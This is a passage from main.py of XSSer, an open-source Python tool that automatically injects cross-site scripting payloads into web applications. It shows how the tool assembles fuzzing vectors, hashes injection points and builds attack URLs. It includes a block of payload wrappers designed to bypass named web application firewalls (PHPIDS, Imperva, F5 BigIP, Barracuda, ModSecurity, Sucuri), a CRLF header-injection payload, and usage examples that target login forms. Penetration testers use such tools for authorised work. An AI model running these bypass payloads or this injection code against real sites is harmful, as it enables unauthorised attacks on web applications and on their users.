main.py 214 KB


 1. #!/usr/bin/env python
 2. # -*- coding: utf-8 -*-"
 3. # vim: set expandtab tabstop=4 shiftwidth=4:
 4. """
 5. This file is part of the XSSer project, https://xsser.03c8.net
 6. Copyright (c) 2010/2021 | psy <epsylon@riseup.net>
 7. xsser is free software; you can redistribute it and/or modify it under
 8. the terms of the GNU General Public License as published by the Free
 9. Software Foundation version 3 of the License.
 10. xsser is distributed in the hope that it will be useful, but WITHOUT ANY
 11. WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
 12. FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
 13. details.
 14. You should have received a copy of the GNU General Public License along
 15. with xsser; if not, write to the Free Software Foundation, Inc., 51
 16. Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
 17. """
 18. import os, re, sys, datetime, hashlib, time, cgi, traceback, webbrowser, random
 19. try:
 20. import urllib.request, urllib.error, urllib.parse
 21. except:
 22. print ("\n[Info] XSSer no longer supports Python2: (https://www.python.org/doc/sunset-python-2/). Try to run the tool with Python3.x.y... (ex: python3 xsser)\n")
 23. sys.exit()
 24. from random import randint
 25. from base64 import b64encode, b64decode
 26. from http.cookies import SimpleCookie
 27. import core.fuzzing
 28. import core.fuzzing.vectors
 29. import core.fuzzing.DCP
 30. import core.fuzzing.DOM
 31. import core.fuzzing.HTTPsr
 32. import core.fuzzing.heuristic
 33. from collections import defaultdict
 34. from itertools import islice, chain
 35. from urllib.parse import parse_qs, urlparse
 36. from core.curlcontrol import Curl
 37. from core.encdec import EncoderDecoder
 38. from core.options import XSSerOptions
 39. from core.dork import Dorker
 40. from core.crawler import Crawler
 41. from core.imagexss import ImageInjections
 42. from core.flashxss import FlashInjections
 43. from core.post.xml_exporter import xml_reporting
 44. from core.tokenhub import HubThread
 45. from core.reporter import XSSerReporter
 46. from core.threadpool import ThreadPool, NoResultsPending
 47. from core.update import Updater
 48. # set to emit debug messages about errors (False = off).
 49. DEBUG = False
 50. class xsser(EncoderDecoder, XSSerReporter):
 51. """
 52. XSSer application class
 53. """
 54. def __init__(self, mothership=None):
 55. self._reporter = None
 56. self._reporters = []
 57. self._landing = False
 58. self._ongoing_requests = 0
 59. self._oldcurl = []
 60. self._gtkdir = None
 61. self._webbrowser = webbrowser
 62. self.crawled_urls = []
 63. self.checked_urls = []
 64. self.successful_urls = []
 65. self.urlmalformed = False
 66. self.search_engines = [] # available dorking search engines
 67. self.search_engines.append('bing') # [26/08/2019: OK!]
 68. self.search_engines.append('yahoo') # [26/08/2019: OK!]
 69. self.search_engines.append('startpage') # [26/08/2019: OK!]
 70. self.search_engines.append('duck') # [26/08/2019: OK!]
 71. #self.search_engines.append('google')
 72. #self.search_engines.append('yandex')
 73. self.user_template = None # wizard user template
 74. self.user_template_conntype = "GET" # GET by default
 75. self.check_tor_url = 'https://check.torproject.org/' # TOR status checking site
 76. if not mothership:
 77. # no mothership so *this* is the mothership
 78. # start the communications hub and rock on!
 79. self.hub = None
 80. self.pool = ThreadPool(0)
 81. self.mothership = None
 82. self.final_attacks = {}
 83. else:
 84. self.hub = None
 85. self.mothership = mothership
 86. self.mothership.add_reporter(self)
 87. self.pool = ThreadPool(0)
 88. self.final_attacks = self.mothership.final_attacks
 89. # initialize the url encoder/decoder
 90. EncoderDecoder.__init__(self)
 91. # your unique real opponent
 92. self.time = datetime.datetime.now()
 93. # this payload comes with vector already..
 94. self.DEFAULT_XSS_PAYLOAD = 'XSS'
 95. # to be or not to be...
 96. self.hash_found = []
 97. self.hash_notfound = []
 98. # other hashes
 99. self.hashed_injections={}
 100. self.extra_hashed_injections={}
 101. self.extra_hashed_vector_url = {}
 102. self.final_hashes = {} # final hashes used by each method
 103. # some counters for checker systems
 104. self.errors_isalive = 0
 105. self.next_isalive = False
 106. self.flag_isalive_num = 0
 107. self.rounds = 0
 108. self.round_complete = 0
 109. # some controls about targets
 110. self.urlspoll = []
 111. # some statistics counters for connections
 112. self.success_connection = 0
 113. self.not_connection = 0
 114. self.forwarded_connection = 0
 115. self.other_connection = 0
 116. # some statistics counters for payloads
 117. self.xsr_injection = 0
 118. self.xsa_injection = 0
 119. self.coo_injection = 0
 120. self.manual_injection = 0
 121. self.auto_injection = 0
 122. self.dcp_injection = 0
 123. self.dom_injection = 0
 124. self.httpsr_injection = 0
 125. self.check_positives = 0
 126. # some statistics counters for injections found
 127. self.xsr_found = 0
 128. self.xsa_found = 0
 129. self.coo_found = 0
 130. self.manual_found = 0
 131. self.auto_found = 0
 132. self.dcp_found = 0
 133. self.dom_found = 0
 134. self.httpsr_found = 0
 135. self.false_positives = 0
 136. # some statistics counters for heuristic parameters
 137. self.heuris_hashes = []
 138. self.heuris_backslash_found = 0
 139. self.heuris_une_backslash_found = 0
 140. self.heuris_dec_backslash_found = 0
 141. self.heuris_backslash_notfound = 0
 142. self.heuris_slash_found = 0
 143. self.heuris_une_slash_found = 0
 144. self.heuris_dec_slash_found = 0
 145. self.heuris_slash_notfound = 0
 146. self.heuris_mayor_found = 0
 147. self.heuris_une_mayor_found = 0
 148. self.heuris_dec_mayor_found = 0
 149. self.heuris_mayor_notfound = 0
 150. self.heuris_minor_found = 0
 151. self.heuris_une_minor_found = 0
 152. self.heuris_dec_minor_found = 0
 153. self.heuris_minor_notfound = 0
 154. self.heuris_semicolon_found = 0
 155. self.heuris_une_semicolon_found = 0
 156. self.heuris_dec_semicolon_found = 0
 157. self.heuris_semicolon_notfound = 0
 158. self.heuris_colon_found = 0
 159. self.heuris_une_colon_found = 0
 160. self.heuris_dec_colon_found = 0
 161. self.heuris_colon_notfound = 0
 162. self.heuris_doublecolon_found = 0
 163. self.heuris_une_doublecolon_found = 0
 164. self.heuris_dec_doublecolon_found = 0
 165. self.heuris_doublecolon_notfound = 0
 166. self.heuris_equal_found = 0
 167. self.heuris_une_equal_found = 0
 168. self.heuris_dec_equal_found = 0
 169. self.heuris_equal_notfound = 0
 170. # xsser verbosity (0 - no output, 1 - dots only, 2+ - real verbosity)
 171. self.verbose = 2
 172. self.options = None
 173. def __del__(self):
 174. if not self._landing:
 175. self.land()
 176. def get_gtk_directory(self):
 177. if self._gtkdir:
 178. return self._gtkdir
 179. local_path = os.path.join(os.path.dirname(os.path.dirname(__file__)),
 180. 'gtk')
 181. if os.path.exists(local_path):
 182. self._gtkdir = local_path
 183. return self._gtkdir
 184. elif os.path.exists('/usr/share/xsser/gtk'):
 185. self._gtkdir = '/usr/share/xsser/gtk'
 186. return self._gtkdir
 187. def set_webbrowser(self, browser):
 188. self._webbrowser = browser
 189. def set_reporter(self, reporter):
 190. self._reporter = reporter
 191. def add_reporter(self, reporter):
 192. self._reporters.append(reporter)
 193. def remove_reporter(self, reporter):
 194. if reporter in self._reporters:
 195. self._reporters.remove(reporter)
 196. def generate_hash(self, attack_type='default'):
 197. """
 198. Generate a new hash for a type of attack.
 199. """
 200. date = str(datetime.datetime.now())
 201. encoded_hash = date + attack_type
 202. return hashlib.md5(encoded_hash.encode('utf-8')).hexdigest()
 203. def generate_numeric_hash(self): # 32 length as md5
 204. """
 205. Generate a new hash for numeric only XSS
 206. """
 207. newhash = ''.join(random.choice('0123456789') for i in range(32))
 208. return newhash
 209. def report(self, msg, level='info'):
 210. """
 211. Report some error from the application.
 212. levels: debug, info, warning, error
 213. """
 214. if self.verbose == 2:
 215. prefix = ""
 216. if level != 'info':
 217. prefix = "["+level+"] "
 218. print(msg)
 219. elif self.verbose:
 220. if level == 'error':
 221. sys.stdout.write("*")
 222. else:
 223. sys.stdout.write(".")
 224. for reporter in self._reporters:
 225. reporter.post(msg)
 226. if self._reporter:
 227. from twisted.internet import reactor
 228. reactor.callFromThread(self._reporter.post, msg)
 229. def set_options(self, options):
 230. """
 231. Set xsser options
 232. """
 233. self.options = options
 234. self._opt_request()
 235. def _opt_request(self):
 236. """
 237. Pass on some properties to Curl
 238. """
 239. options = self.options
 240. for opt in ['cookie', 'agent', 'referer',\
 241. 'headers', 'atype', 'acred', 'acert',
 242. 'proxy', 'ignoreproxy', 'timeout',
 243. 'delay', 'tcp_nodelay', 'retries',
 244. 'xforw', 'xclient', 'threads',
 245. 'dropcookie', 'followred', 'fli',
 246. 'nohead', 'isalive', 'alt', 'altm',
 247. 'ald'
 248. ]:
 249. if hasattr(options, opt) and getattr(options, opt):
 250. setattr(Curl, opt, getattr(options, opt))
 251. def get_payloads(self):
 252. """
 253. Process payload options and make up the payload list for the attack.
 254. """
 255. options = self.options
 256. # payloading sources for --auto
 257. payloads_fuzz = core.fuzzing.vectors.vectors
 258. if options.fzz_info or options.fzz_num or options.fzz_rand and not options.fuzz:
 259. self.options.fuzz = True
 260. # set a type for XSS auto-fuzzing vectors
 261. if options.fzz_info:
 262. fzz_payloads = []
 263. for fuzz in payloads_fuzz:
 264. if not fuzz["browser"] == "[Not Info]":
 265. fzz_payloads.append(fuzz)
 266. payloads_fuzz = fzz_payloads
 267. # set a limit for XSS auto-fuzzing vectors
 268. if options.fzz_num:
 269. try:
 270. options.fzz_num = int(options.fzz_num)
 271. except:
 272. options.fzz_num = len(payloads_fuzz)
 273. fzz_num_payloads = []
 274. fzz_vector = 0
 275. for fuzz in payloads_fuzz:
 276. fzz_vector = fzz_vector + 1
 277. if int(fzz_vector) < int(options.fzz_num)+1:
 278. fzz_num_payloads.append(fuzz)
 279. payloads_fuzz = fzz_num_payloads
 280. # set random order for XSS auto-fuzzing vectors
 281. if options.fzz_rand:
 282. try:
 283. from random import shuffle
 284. shuffle(payloads_fuzz) # shuffle paylods
 285. except:
 286. pass
 287. payloads_dcp = core.fuzzing.DCP.DCPvectors
 288. payloads_dom = core.fuzzing.DOM.DOMvectors
 289. payloads_httpsr = core.fuzzing.HTTPsr.HTTPrs_vectors
 290. manual_payload = [{"payload":options.script, "browser":"[manual_injection]"}]
 291. # sustitute payload for hash to check for false positives
 292. self.hashed_payload = "XSS"
 293. checker_payload = [{"payload":self.hashed_payload, "browser":"[hashed_precheck_system]"}]
 294. # heuristic parameters
 295. heuristic_params = core.fuzzing.heuristic.heuristic_test
 296. def enable_options_heuristic(payloads):
 297. if options.heuristic:
 298. payloads = heuristic_params + payloads
 299. if options.dom:
 300. payloads = payloads + payloads_dom
 301. return payloads
 302. if options.fuzz:
 303. payloads = payloads_fuzz
 304. if options.dcp:
 305. payloads = payloads + payloads_dcp
 306. if options.script:
 307. payloads = payloads + manual_payload
 308. if options.hash:
 309. payloads = checker_payload + payloads
 310. if options.inducedcode:
 311. payloads = payloads + payloads_httpsr
 312. if options.heuristic:
 313. payloads = heuristic_params + payloads
 314. if options.dom:
 315. payloads = payloads + payloads_dom
 316. elif options.inducedcode:
 317. payloads = payloads + payloads_httpsr
 318. if options.heuristic:
 319. payloads = heuristic_params + payloads
 320. if options.dom:
 321. payloads = payloads + payloads_dom
 322. elif options.dom:
 323. payloads = payloads + payloads_dom
 324. elif options.heuristic:
 325. payloads = heuristic_params + payloads
 326. if options.dom:
 327. payloads = payloads + payloads_dom
 328. elif options.dom:
 329. payloads = payloads + payloads_dom
 330. elif options.hash:
 331. payloads = checker_payload + payloads
 332. if options.inducedcode:
 333. payloads = payloads + payloads_httpsr
 334. if options.heuristic:
 335. payloads = heuristic_params + payloads
 336. if options.dom:
 337. payloads = payloads + payloads_dom
 338. elif options.dom:
 339. payloads = payloads + payloads_dom
 340. elif options.inducedcode:
 341. payloads = payloads + payloads_httpsr
 342. if options.heuristic:
 343. payloads = heuristic_params + payloads
 344. if options.dom:
 345. payloads = payloads + payloads_dom
 346. elif options.dom:
 347. payloads = payloads + payloads_dom
 348. elif options.script:
 349. payloads = payloads + manual_payload
 350. if options.hash:
 351. payloads = checker_payload + payloads
 352. if options.inducedcode:
 353. payloads = payloads + payloads_httpsr
 354. if options.heuristic:
 355. payloads = heuristic_params + payloads
 356. if options.dom:
 357. payloads = payloads + payloads_dom
 358. elif options.hash:
 359. payloads = checker_payload + payloads
 360. if options.inducedcode:
 361. payloads = payloads + payloads_httpsr
 362. if options.heuristic:
 363. payloads = heuristic_params + payloads
 364. if options.dom:
 365. payloads = payloads + payloads_dom
 366. elif options.dom:
 367. payloads = payloads + payloads_dom
 368. elif options.heuristic:
 369. payloads = heuristic_params + payloads
 370. if options.dom:
 371. payloads = payloads + payloads_dom
 372. elif options.dom:
 373. payloads = payloads + payloads_dom
 374. elif options.inducedcode:
 375. payloads = payloads + payloads_httpsr
 376. if options.hash:
 377. payloads = checker_payload + payloads
 378. if options.heuristic:
 379. payloads = heuristic_params + payloads
 380. if options.dom:
 381. payloads = payloads + payloads_dom
 382. elif options.dom:
 383. payloads = payloads + payloads_dom
 384. elif options.heuristic:
 385. payloads = heuristic_params + payloads
 386. if options.dom:
 387. payloads = payloads + payloads_dom
 388. elif options.dom:
 389. payloads = payloads + payloads_dom
 390. elif options.dcp:
 391. payloads = payloads_dcp
 392. if options.script:
 393. payloads = payloads + manual_payload
 394. if options.hash:
 395. payloads = checker_payload + payloads
 396. if options.inducedcode:
 397. payloads = payloads + payloads_httpsr
 398. if options.heuristic:
 399. payloads = heuristic_params + payloads
 400. if options.dom:
 401. payloads = payloads + payloads_dom
 402. elif options.hash:
 403. payloads = checker_payload + payloads
 404. if options.inducedcode:
 405. payloads = payloads + options.inducedcode
 406. if options.heuristic:
 407. payloads = heuristic_params + payloads
 408. if options.dom:
 409. payloads = payloads + payloads_dom
 410. elif options.dom:
 411. payloads = payloads + payloads_dom
 412. elif options.inducedcode:
 413. payloads = payloads + payloads_httpsr
 414. if options.heuristic:
 415. payloads = heuristic_params + payloads
 416. if options.dom:
 417. payloads = payloads + payloads_dom
 418. elif options.dom:
 419. payloads = payloads + payloads_dom
 420. elif options.heuristic:
 421. payloads = heuristic_params + payloads
 422. if options.dom:
 423. payloads = payloads + payloads_dom
 424. elif options.dom:
 425. payloads = payloads + payloads_dom
 426. elif options.script:
 427. payloads = manual_payload
 428. if options.hash:
 429. payloads = checker_payload + payloads
 430. if options.inducedcode:
 431. payloads = payloads + payloads_httpsr
 432. if options.heuristic:
 433. payloads = heuristic_params + payloads
 434. if options.dom:
 435. payloads = payloads + payloads_dom
 436. elif options.inducedcode:
 437. payloads = payloads + payloads_httpsr
 438. if options.heuristic:
 439. payloads = heuristic_params + payloads
 440. if options.dom:
 441. payloads = payloads + payloads_dom
 442. elif options.dom:
 443. payloads = payloads + payloads_dom
 444. elif options.heuristic:
 445. payloads = heuristic_params + payloads
 446. if options.dom:
 447. payloads = payloads + payloads_dom
 448. elif options.dom:
 449. payloads = payloads + payloads_dom
 450. elif options.inducedcode:
 451. payloads = payloads_httpsr
 452. if options.hash:
 453. payloads = checker_payload + payloads
 454. if options.heuristic:
 455. payloads = heuristic_params + payloads
 456. if options.dom:
 457. payloads = payloads + payloads_dom
 458. elif options.heuristic:
 459. payloads = heuristic_params + payloads
 460. if options.dom:
 461. payloads = payloads + payloads_dom
 462. elif options.dom:
 463. payloads = payloads + payloads_dom
 464. elif options.heuristic:
 465. payloads = heuristic_params
 466. if options.hash:
 467. payloads = checker_payload + payloads
 468. if options.dom:
 469. payloads = payloads + payloads_dom
 470. elif options.dom:
 471. payloads = payloads + payloads_dom
 472. elif options.dom:
 473. payloads = payloads_dom
 474. elif not options.fuzz and not options.dcp and not options.script and not options.hash and not options.inducedcode and not options.heuristic and not options.dom:
 475. payloads = [{"payload":'">PAYLOAD',
 476. "browser":"[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"
 477. }]
 478. else:
 479. payloads = checker_payload
 480. return payloads
 481. def process_ipfuzzing(self, text):
 482. """
 483. Mask ips in given text to DWORD
 484. """
 485. ips = re.findall("\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", text)
 486. for ip in ips:
 487. text = text.replace(ip, str(self._ipDwordEncode(ip)))
 488. return text
 489. def process_ipfuzzing_octal(self, text):
 490. """
 491. Mask ips in given text to Octal
 492. """
 493. ips = re.findall("\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", text)
 494. for ip in ips:
 495. text = text.replace(ip, str(self._ipOctalEncode(ip)))
 496. return text
 497. def process_payloads_ipfuzzing(self, payloads):
 498. """
 499. Mask ips for all given payloads using DWORD
 500. """
 501. # ip fuzzing (DWORD)
 502. if self.options.Dwo:
 503. resulting_payloads = []
 504. for payload in payloads:
 505. payload["payload"] = self.process_ipfuzzing(payload["payload"])
 506. resulting_payloads.append(payload)
 507. return resulting_payloads
 508. return payloads
 509. def process_payloads_ipfuzzing_octal(self, payloads):
 510. """
 511. Mask ips for all given payloads using OCTAL
 512. """
 513. # ip fuzzing (OCTAL)
 514. if self.options.Doo:
 515. resulting_payloads = []
 516. for payload in payloads:
 517. payload["payload"] = self.process_ipfuzzing_octal(payload["payload"])
 518. resulting_payloads.append(payload)
 519. return resulting_payloads
 520. return payloads
 521. def get_query_string(self):
 522. """
 523. Get the supplied query string.
 524. """
 525. if self.options.postdata:
 526. return self.options.postdata
 527. elif self.options.getdata:
 528. return self.options.getdata
 529. return ""
 530. def attack_url(self, url, payloads, query_string):
 531. """
 532. Attack the given url checking or not if is correct.
 533. """
 534. if not self.options.nohead:
 535. for payload in payloads:
 536. self.rounds = self.rounds + 1
 537. self.attack_url_payload(url, payload, query_string)
 538. else:
 539. hc = Curl()
 540. try:
 541. urls = hc.do_head_check([url])
 542. except:
 543. self.report("[Error] Target URL: (" + url + ") is malformed!" + " [DISCARDED]" + "\n")
 544. return
 545. self.report("-"*50 + "\n")
 546. if str(hc.info()["http-code"]) in ["200", "302", "301", "401"]:
 547. if str(hc.info()["http-code"]) in ["301"]:
 548. url = str(hc.info()["Location"])
 549. payload = ""
 550. query_string = ""
 551. elif str(hc.info()["http-code"]) in ["302"]:
 552. url = url + "/"
 553. payload = ""
 554. query_string = ""
 555. self.success_connection = self.success_connection + 1
 556. self.report("[Info] HEAD-CHECK: OK! [HTTP-" + hc.info()["http-code"] + "] -> [AIMED]\n")
 557. for payload in payloads:
 558. self.attack_url_payload(url, payload, query_string)
 559. else:
 560. if str(hc.info()["http-code"]) in ["405"]:
 561. self.report("[Info] HEAD-CHECK: NOT ALLOWED! [HTTP-" + hc.info()["http-code"] + "] -> [PASSING]\n")
 562. self.success_connection = self.success_connection + 1
 563. for payload in payloads:
 564. self.attack_url_payload(url, payload, query_string)
 565. else:
 566. self.not_connection = self.not_connection + 1
 567. self.report("[Error] HEAD-CHECK: FAILED! [HTTP-" + hc.info()["http-code"] + "] -> [DISCARDED]\n")
 568. self.report("-"*50 + "\n")
 569. def not_keyword_exit(self):
 570. self.report("="*30)
 571. self.report("\n[Error] XSSer cannot find a correct place to start an attack. Aborting!...\n")
 572. self.report("-"*25)
 573. self.report("\n[Info] This is because you aren't providing:\n\n At least one -payloader- using a keyword: 'XSS' (for hex.hash) or 'X1S' (for int.hash):\n")
 574. self.report(" - ex (GET): xsser -u 'https://target.com' -g '/path/profile.php?username=bob&surname=XSS&age=X1S&job=XSS'")
 575. self.report(" - ex (POST): xsser -u 'https://target.com/login.php' -p 'username=bob&password=XSS&captcha=X1S'\n")
 576. self.report(" Any extra attack(s) (Xsa, Xsr, Coo, Dorker, Crawler...):\n")
 577. self.report(" - ex (GET+Cookie): xsser -u 'https://target.com' -g '/path/id.php?=2' --Coo")
 578. self.report(" - ex (POST+XSA+XSR+Cookie): xsser -u 'https://target.com/login.php' -p 'username=admin&password=admin' --Xsa --Xsr --Coo")
 579. self.report(" - ex (Dorker): xsser -d 'news.php?id=' --Da")
 580. self.report(" - ex (Crawler): xsser -u 'https://target.com' -c 100 --Cl\n")
 581. self.report(" Or a mixture:\n")
 582. self.report(" - ex (GET+Manual): xsser -u 'https://target.com' -g '/users/profile.php?user=XSS&salary=X1S' --payload='<script>alert(XSS);</script>'")
 583. self.report(" - ex (POST+Manual): xsser -u 'https://target.com/login.asp' -p 'username=bob&password=XSS' --payload='}}%%&//<sc&ri/pt>(XSS)--;>'\n")
 584. self.report(" - ex (GET+Cookie): xsser -u 'https://target.com' -g '/login.asp?user=bob&password=XSS' --Coo")
 585. self.report(" - ex (POST+XSR+XSA): xsser -u 'https://target.com/login.asp' -p 'username=bob&password=XSS' --Xsr --Xsa\n")
 586. self.report("="*75 + "\n")
 587. if not self.options.xsser_gtk:
 588. sys.exit(2)
 589. else:
 590. pass
 591. def get_url_payload(self, url, payload, query_string, user_attack_payload):
 592. """
 593. Attack the given url within the given payload
 594. """
 595. options = self.options
 596. self._ongoing_attacks = {}
 597. if (self.options.xsa or self.options.xsr or self.options.coo):
 598. agent, referer, cookie = self._prepare_extra_attacks(payload)
 599. else:
 600. agents = [] # user-agents
 601. try:
 602. f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
 603. except:
 604. f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing
 605. for line in f:
 606. agents.append(line)
 607. agent = random.choice(agents).strip() # set random user-agent
 608. referer = "127.0.0.1"
 609. cookie = None
 610. if options.agent:
 611. agent = options.agent
 612. else:
 613. self.options.agent = agent
 614. if options.referer:
 615. referer = options.referer
 616. else:
 617. self.options.referer = referer
 618. if options.cookie: # set formatted by user cookies
 619. cookie = options.cookie
 620. else:
 621. self.options.cookie = cookie
 622. # get payload/vector
 623. payload_string = payload['payload'].strip()
 624. ### Anti-antiXSS exploits
 625. # PHPIDS (>0.6.5) [ALL] -> 32*payload + payload
 626. if options.phpids065:
 627. payload_string = 32*payload_string + payload_string
 628. # PHPIDS (>0.7) [ALL] -> payload: 'svg-onload' (23/04/2016)
 629. if options.phpids070:
 630. payload_string = '<svg+onload=+"'+payload_string+'">'
 631. # Imperva Incapsula [ALL] -> payload: 'img onerror' + payload[DoubleURL+HTML+Unicode] 18/02/2016
 632. if options.imperva:
 633. payload_string = '<img src=x onerror="'+payload_string+'">'
 634. # WebKnight (>4.1) [Chrome] payload: 'details ontoggle' 18/02/2016
 635. if options.webknight:
 636. payload_string = '<details ontoggle='+payload_string+'>'
 637. # F5BigIP [Chrome+FF+Opera] payload: 'onwheel' 18/02/2016
 638. if options.f5bigip:
 639. payload_string = '<body style="height:1000px" onwheel="'+payload_string+'">'
 640. # Barracuda WAF [ALL] payload: 'onwheel' 18/02/2016
 641. if options.barracuda:
 642. payload_string = '<body style="height:1000px" onwheel="'+payload_string+'">'
 643. # Apache / modsec [ALL] payload: special 18/02/2016
 644. if options.modsec:
 645. payload_string = '<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover='+payload_string+'>'
 646. # QuickDefense [Chrome] payload: 'ontoggle' + payload[Unicode] 18/02/2016
 647. if options.quickdefense:
 648. payload_string = '<details ontoggle="'+payload_string+'">'
 649. # SucuriWAF [ALL] payload: 'ontoggle' + payload[Unicode] 18/02/2016
 650. if options.sucuri:
 651. payload_string = '<a+id="a"href=javascript%26colon;alert%26lpar;'+payload_string+'%26rpar;+id="a" style=width:100%25;height:100%25;position:fixed;left:0;top:0 x>Y</a>'
 652. # Firefox 12 (and below) # 09/2019
 653. if options.firefox:
 654. payload_string = "<script type ='text/javascript'>"+payload_string+"</script>"
 655. # Chrome 19 (and below, but also Firefox 12 and below) # 09/2019
 656. if options.chrome:
 657. payload_string = "<script>/*///*/"+payload_string+"</script>"
 658. # Internet Explorer 9 (but also Firefox 12 and below) # 09/2019
 659. if options.iexplorer:
 660. payload_string = 'cooki1%3dvalue1;%0d%0aX-XSS-Protection:0%0d%0a%0d%0a<html><body><script>'+payload_string+'</script></body></html>'
 661. # Opera 10.6 (but also IE6) # 09/2019
 662. if options.opera:
 663. payload_string = "<Table background = javascript: alert ("+payload_string+")> </ table>"
 664. # Substitute the attacking hash
 665. if 'PAYLOAD' in payload_string or 'VECTOR' in payload_string:
 666. payload_string = payload_string.replace('PAYLOAD', self.DEFAULT_XSS_PAYLOAD)
 667. payload_string = payload_string.replace('VECTOR', self.DEFAULT_XSS_PAYLOAD)
 668. hashed_payload = payload_string
 669. # Imperva
 670. if options.imperva:
 671. hashed_payload = urllib.parse.urlencode({'':hashed_payload})
 672. hashed_payload = urllib.parse.urlencode({'':hashed_payload}) #DoubleURL encoding
 673. hashed_payload = cgi.escape(hashed_payload) # + HTML encoding
 674. hashed_payload = str(hashed_payload) # + Unicode
 675. # Quick Defense
 676. if options.quickdefense:
 677. hashed_payload = str(hashed_payload) # + Unicode
 678. # apply user final attack url payload
 679. if user_attack_payload:
 680. hashed_vector_url = self.encoding_permutations(user_attack_payload)
 681. else:
 682. hashed_vector_url = self.encoding_permutations(hashed_payload)
 683. # replace special payload string also for extra attacks
 684. if self.extra_hashed_injections:
 685. hashed_payload = hashed_payload.replace('XSS', 'PAYLOAD')
 686. for k, v in self.extra_hashed_injections.items():
 687. if v[1] in hashed_payload:
 688. self.extra_hashed_vector_url[k] = v[0], hashed_payload
 689. self.extra_hashed_injections = self.extra_hashed_vector_url
 690. if not options.getdata: # using GET as a single input (-u)
 691. target_url = url
 692. else:
 693. if not url.endswith("/") and not options.getdata.startswith("/"):
 694. url = url + "/"
 695. target_url = url + options.getdata
 696. if not options.dom:
 697. p_uri = urlparse(target_url, allow_fragments=False) # not fragments keyword '#' allowed
 698. else:
 699. p_uri = urlparse(target_url, allow_fragments=True)
 700. uri = p_uri.netloc
 701. path = p_uri.path
 702. if not uri.endswith('/') and not path.startswith('/'):
 703. uri = uri + "/"
 704. if self.options.target or self.options.crawling: # for audit entire target allows target without 'XSS/X1S' keyword
 705. if not "XSS" in target_url:
 706. if not target_url.endswith("/"):
 707. target_url = target_url + "/XSS"
 708. else:
 709. target_url = target_url + "XSS"
 710. target_params = parse_qs(urlparse(target_url).query, keep_blank_values=True)
 711. if self.options.script:
 712. if not 'XSS' in self.options.script and not self.options.crawling: # 'XSS' keyword used to change PAYLOAD at target_params
 713. self.not_keyword_exit()
 714. if not target_params and not options.postdata:
 715. if not self.options.xsa and not self.options.xsr and not self.options.coo: # extra attacks payloads
 716. if not 'XSS' in target_url and not 'X1S' in target_url and not self.options.crawling: # not any payloader found!
 717. self.not_keyword_exit()
 718. else: # keyword found at target url (ex: https://target.com/XSS)
 719. if 'XSS' in target_url:
 720. url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
 721. elif 'X1S' in target_url:
 722. url_orig_hash = self.generate_numeric_hash() # new hash for each parameter with an injection
 723. hashed_payload = payload_string.replace('XSS', url_orig_hash)
 724. if "[B64]" in hashed_payload: # [DCP Injection]
 725. dcp_payload = hashed_payload.split("[B64]")[1]
 726. dcp_preload = hashed_payload.split("[B64]")[0]
 727. dcp_payload = b64encode(dcp_payload)
 728. hashed_payload = dcp_preload + dcp_payload
 729. self.hashed_injections[url_orig_hash] = target_url
 730. if user_attack_payload:
 731. pass
 732. else:
 733. hashed_vector_url = self.encoding_permutations(hashed_payload)
 734. target_params[''] = hashed_vector_url # special target_param when XSS only at target_url
 735. target_url_params = urllib.parse.urlencode(target_params)
 736. if not uri.endswith('/') and not path.startswith('/'):
 737. uri = uri + "/"
 738. if path.endswith('/'):
 739. path = path.replace('/',"")
 740. if not options.getdata:
 741. dest_url = url
 742. else:
 743. dest_url = url + options.getdata
 744. if not "XSS" in dest_url:
 745. dest_url = dest_url + hashed_vector_url
 746. else:
 747. if 'XSS' in dest_url:
 748. dest_url = dest_url.replace('XSS', hashed_vector_url)
 749. if 'X1S' in dest_url:
 750. dest_url = dest_url.replace('X1S', hashed_vector_url)
 751. else:
 752. if 'XSS' in target_url:
 753. url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
 754. elif 'X1S' in target_url:
 755. url_orig_hash = self.generate_numeric_hash() # new hash for each parameter with an injection
 756. hashed_payload = payload_string.replace('XSS', url_orig_hash)
 757. if "[B64]" in hashed_payload: # [DCP Injection]
 758. dcp_payload = hashed_payload.split("[B64]")[1]
 759. dcp_preload = hashed_payload.split("[B64]")[0]
 760. dcp_payload = b64encode(dcp_payload)
 761. hashed_payload = dcp_preload + dcp_payload
 762. self.hashed_injections[url_orig_hash] = target_url
 763. if user_attack_payload:
 764. pass
 765. else:
 766. hashed_vector_url = self.encoding_permutations(hashed_payload)
 767. target_params[''] = hashed_vector_url # special target_param when XSS only at target_url
 768. target_url_params = urllib.parse.urlencode(target_params)
 769. if not uri.endswith('/') and not path.startswith('/'):
 770. uri = uri + "/"
 771. dest_url = p_uri.scheme + "://" + uri + path
 772. if 'XSS' in dest_url:
 773. dest_url = dest_url.replace('XSS', hashed_vector_url)
 774. if 'X1S' in dest_url:
 775. dest_url = dest_url.replace('X1S', hashed_vector_url)
 776. dest_url = p_uri.scheme + "://" + uri + path + "?" + target_url_params
 777. else:
 778. if not options.postdata:
 779. r = 0
 780. for key, value in target_params.items(): # parse params searching for keywords
 781. for v in value:
 782. if v == 'XSS' or v == 'X1S': # user input keywords where inject a payload
 783. if v == 'XSS':
 784. url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
 785. elif v == 'X1S':
 786. url_orig_hash = self.generate_numeric_hash() # new hash for each parameter with an injection
 787. hashed_payload = payload_string.replace('XSS', url_orig_hash)
 788. if "[B64]" in hashed_payload: # [DCP Injection]
 789. dcp_payload = hashed_payload.split("[B64]")[1]
 790. dcp_preload = hashed_payload.split("[B64]")[0]
 791. dcp_payload = b64encode(dcp_payload)
 792. hashed_payload = dcp_preload + dcp_payload
 793. self.hashed_injections[url_orig_hash] = key
 794. if user_attack_payload:
 795. pass
 796. else:
 797. hashed_vector_url = self.encoding_permutations(hashed_payload)
 798. target_params[key] = hashed_vector_url
 799. r = r + 1
 800. else:
 801. if self.options.xsa or self.options.xsr or self.options.coo:
 802. url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
 803. self.hashed_injections[url_orig_hash] = key
 804. target_params[key] = v
 805. r = r + 1
